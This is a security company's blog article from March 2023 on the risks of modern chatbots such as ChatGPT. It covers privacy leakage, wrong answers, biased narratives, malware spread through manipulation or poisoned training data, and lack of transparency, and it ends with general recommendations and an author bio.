Modern Chatbots - Advanced Dangers and Risks

Modern Chatbots

Advanced Dangers and Risks

Marc Ruef
by Marc Ruef
on March 23, 2023
time to read: 8 minutes

Keypoints

Dangers Posed by Modern Chatbots

  • Modern chatbots such as ChatGPT have a far-reaching social impact
  • There are various risks for operators and users of corresponding systems
  • This starts with secrecy and privacy, incorrect response behavior, problematic narratives and malware
  • Basically, systems must bring more transparency in order to be able to build and maintain trust

Probably no other technical development had sparked such a social discussion in recent years as ChatGPT. The Chatbot is able to convince with a very high language understanding and a far-reaching knowledge database. It is foreseeable that such systems will put many professions under pressure. But such solutions introduce additional risks for operators and users. This article shows which dangers must be considered and how they can be countered.

ChatGPT is based on GPT trained with big data to acquire fluency. The ability to provide human-like answers is based on the use of deep learning, which allows to classify language and meaning of sentences. Subsequently, machine learning is used to generate an appropriate response based on the data and information collected during the training process. Thus, the system cannot understand or think in the human sense, but approximates texts that it once learned. For this reason, answers may vary depending on the complexity of the question and the availability of relevant information.

Violation of Secrecy and Privacy

Chatbots interact with humans. In dialog, it may be given that the user discloses sensitive and sensitive data. For example, when an AI-supported quote is to be created and customer-specific details are entered for this purpose. This data becomes accessible to the AI operator and could be misused.

However, self-learning systems can also use these inputs for further processing. Thus, if user A enters details about a customer X, user B could receive those same details as a response to a similar query.

Potential misuse ranges from copyright infringement to social engineering attacks to identity theft and extortion. For this reason, it is recommended to be very careful with sensitive requests. Personal, sensitive and customer-specific information should be avoided as much as possible. Companies should issue guidelines on how such systems may be handled. These guidelines can be based on those already issued for online translation services, for example.

Erroneous Response Behavior

Modern chatbots are trained using existing data sets. This allows them to acquire the relevant knowledge and respond to questions coherently – or at least pretend to be sure of their answers. The quality and quantity of the source material is largely responsible for the quality of the responses. Incorrect or manipulated material can lead to unwelcome effects. For example, untruths can be spread, fueling the concept of Fake News.

A long-term danger, which will grow steadily, is posed by feedback loops. What happens when chatbots are trained on data generated by chatbots? Faulty data is thus amplified and is established by systems as absolute truths.

Responses generated by chatbots must therefore always be checked to ensure that their content is correct. It does not matter whether a short biogarphy, a summary of a news report or a rough offer was generated. A plausibility check of this kind presupposes of course that the user of the system can understand and classify the contents. The generation of results is simple in each case. Classifying and ensuring quality, on the other hand, requires extensive understanding.

A chatbot provider should provide an uncomplicated way to mark faulty dialogs as such and to be able to submit suggestions for changes. This way, the quality of the solution can be increased through the active cooperation of the users.

Reinforcing Problematic Narratives

When training chatbots, the operators define the data set and with it the weighting of the individual statements. This is inevitably linked to a certain tendency subjectivity. Through this it can be given that certain narratives come very ausgepägt to the validity, others are marginalized however. Problematic, offensive and discriminatory effects can be amplified.

When training chatbots, attention must be paid to the quality of the data set. The weighting of individual statements must be carefully worked out, with certain tendencies flagged or rigorously prevented. Unfiltered misogynistic and racist statements as well as the spreading of scurrilous conspiracy theories cannot bring any benefit.

Here, too, providers should provide appropriate functions for reporting problematic content in an uncomplicated manner. These should then be checked, adjusted or prevented in a moderation process.

Large manufacturers such as Microsoft and Google have come under pressure from ChatGPT and do not want to leave the worthwhile market to competitors without a fight. It can be observed that they want to gain an advantage by partially reducing or completely abolishing the ethics teams . This may be the case on a commercial level in the short term. In the long run, however, this decision will take its toll. For with every problematic statement, a system loses trust and acceptance. This cannot be regained without further ado, as research from the area of man-machine trust and trust establishment has shown.

Spreading Malware

Manipulating or compromising a chatbot can cause it to spread malware. This can happen, as with other applications, via vulnerabilities such as cross site scripting or SQL injection. However, such an attack can also take place on the dataset. If, for example, a chatbot is used for generating program code, manipulation could lead to malicious code being infiltrated and output in dialogs that appear harmless.

Responses from chatbots must therefore always be controlled. The content control must also be carefully implemented for code samples in order to prevent security vulnerabilities in generated code or malicious code parts from being executed in productive environments.

Lack of Transparency

It is not uncommon for a chatbot to come up with an answer that makes amazing sense. Sometimes, however, the opposite is true. Whatever the case, users may feel the need to understand why this particular answer was chosen. But most systems lack transparency of this kind. Instead, it is up to the user to correctly classify and accept a dialog. This lack of insight can lead to a certain bondage. Especially when topics are discussed whose contents and implications cannot be assessed by users, or only to a limited extent.

It must be a declared goal for developers of AI solutions that their products come along with a so-called verbose mode. The user must always have the possibility to demand an explanation for a result. For chatbots, a simple solution is to allow the user to ask a why question: Why did you give this answer? It is then up to the chatbot to show the derivation for the result, in order to be able to give some degree of confidence to its own approach. So far, we are unfortunately further away from current solutions being able to offer mechanisms of this kind.

Conclusion

As with any technology, there are risks associated with its use. It is therefore critical that developers and users are aware of these risks and seek appropriate measures to ensure the security and privacy of data and information shared by chatbots.

Overall, AI-based chatbots in mass now offer exciting possibilities for human-machine interaction. But it remains important to approach with skeptical optimism and prioritize the security of the system and its users.

To minimize risk, it is important to follow best practices in cybersecurity. It is therefore crucial to maintain transparency and accountability in the development and deployment of chatbots, on the one hand with regard to ethical aspects. In doing so, the legal obligations related to the AI Act of the EU must be observed. The Regulation of AI Systems in the EU (also affects all those who want to trade with the EU) may possibly result in a general ban on text-generating systems or very high requirements will be placed on operators, which will also be difficult to fulfill in part for financial reasons.

About the Author

Marc Ruef

Marc Ruef has been working in information security since the late 1990s. He is well-known for his many publications and books. The last one called The Art of Penetration Testing is discussing security testing in detail. He is a lecturer at several faculties, like ETH, HWZ, HSLU and IKF. (ORCID 0000-0002-1328-6357)

Links

You want to evaluate or develop an AI?

Our experts will get in contact with you!

×
Specific Criticism of CVSSv4

Specific Criticism of CVSSv4

Marc Ruef

scip Cybersecurity Forecast

scip Cybersecurity Forecast

Marc Ruef

Voice Authentication

Voice Authentication

Marc Ruef

Bug Bounty

Bug Bounty

Marc Ruef

You want more?

Further articles available here

You need support in such a project?

Our experts will get in contact with you!

You want more?

Further articles available here